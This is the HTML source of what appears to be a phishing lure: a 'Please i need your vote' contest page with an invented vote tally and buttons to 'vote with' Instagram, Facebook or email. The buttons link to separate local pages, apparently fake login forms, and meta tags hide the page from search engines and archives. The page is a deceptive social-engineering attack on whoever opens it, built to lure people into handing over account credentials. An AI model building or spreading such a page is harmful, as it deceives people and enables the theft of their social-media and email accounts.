

<!-- <div id="google_translate_element" style='position: fixed; bottom: 0; left: 0'></div>
  <script type="text/javascript">
        function googleTranslateElementInit() {
            new google.translate.TranslateElement({pageLanguage: 'en', layout: google.translate.TranslateElement.InlineLayout.SIMPLE}, 'google_translate_element');
        }
    </script>

    <script type="text/javascript" src="https://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script> --><!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title></title>

    <meta name="robots" content="noindex">
    <meta name="googlebot" content="noarchive">

    <link rel="stylesheet" href="https://pro.fontawesome.com/releases/v6.0.0-beta1/css/all.css" integrity="SHA384-ABC123==" crossorigin="anonymous">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">

</head>

<body>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body {
            background: #eeeded;
            font-family: 'Trebuchet MS', 'Lucida Sans Unicode', 'Lucida Grande', 'Lucida Sans', Arial, sans-serif;
            color: #525151;
            margin: 70px 0;
        }

        .container-item {
            background-color: white;
            width: 90%;
            margin: 0 50%;
            transform: translateX(-50%);
            border-radius: 3px;
        }

        #social-ul {
            display: flex;
            list-style-type: none;
            justify-content: center;
            align-items: center;
            margin: 5px 0;
        }

        #social-ul li {
            margin: 5px;
            background: #069c6c;
            color: white;
            padding: 7px 10px;
            border-radius: 3px;
            font-size: 13px;
        }

        #social-ul li:nth-child(2) {
            background: #da2828;
        }

        #list-item {
            list-style-type: none;
            margin: 10px 0;
        }

        #list-item li {
            padding: 8px 10px;
        }

        #list-item li:nth-child(1) {
            background: #5aa7f46a;
            color: #0d4d8c;
            border-left: 2px solid dodgerblue;
        }

        a {
            color: inherit;
            text-decoration: none;
        }

        @media screen and (min-width: 768px) {
            .container-item {
                width: 50%;
            }
        }

        @media screen and (min-width: 1200px) {
            .container-item {
                width: 40%;
            }
        }
    </style>
    <div class="container">
        <div class="container-item">
            <p style='text-align: center; font-size: 20px; margin: 10px 0; text-transform: uppercase; padding: 10px 0; font-weight: bold'>Please i need your vote</p>
            <img src="https://cdn.glitch.global/71ee619e-88b3-46bc-844d-9adb03253e64/voting.jpeg" width="100%">
            <p style='text-align: center; padding: 5px; font-weight: bold'>Host vote</p>
            <div class="counter" style='border: 2px solid dodgerblue; border-radius: 3px; margin: 0 5%; padding: 5px 10px ;'>
                <div style='display: flex; justify-content: center'>
                    <input type="radio" checked style='color: dodgerblue'>
                    <p style='padding: 0 3px; font-size: 14px; padding: 10px 0'> Total Votes: 564 out of 800</p>
                </div>
                <div style='display: flex; justify-content: center; margin: 3px 10%'>
                    <div class="progress-container" style='width: 100%; background: #edeaea; height: 6.5px; border-radius: 3px; overflow: hidden;'>
                        <div class="progress" style='background: dodgerblue; width: 90%; height: 6.5px'></div>
                    </div>
                </div>
            </div>
            <p style='text-align: center; font-weight: bold; padding: 4px 0; margin: 10px 0; font-size: 20px'><i class="fa fa-check"></i> Total Votes To Win: 236</p>
            <div style='display: flex; justify-content: center; '>
                <a href="gi.html"><button style='margin: 5px; padding: 10px; background: #e02a6d; color: white; border-radius: 3px; border: none; '>VOTE WITH <i class="fa fa-instagram"></i></button></a>
            <a href="bf.html"><button style='margin: 5px; padding: 10px; background: #277dee; color: white; border-radius: 3px; border: none; '>VOTE WITH <i class="fa fa-facebook"></i></button></a> 
                <a href="mi.html"><button style='margin: 5px; padding: 10px; background: #e02a3f; color: white; border-radius: 3px; border: none; '>VOTE WITH <i class="fa fa-envelope"></i></button></a>

            </div><br>
        </div>
    </div>
    <br><br>

</body>
<!-- https://cdn.glitch.global/71ee619e-88b3-46bc-844d-9adb03253e64 -->
</html>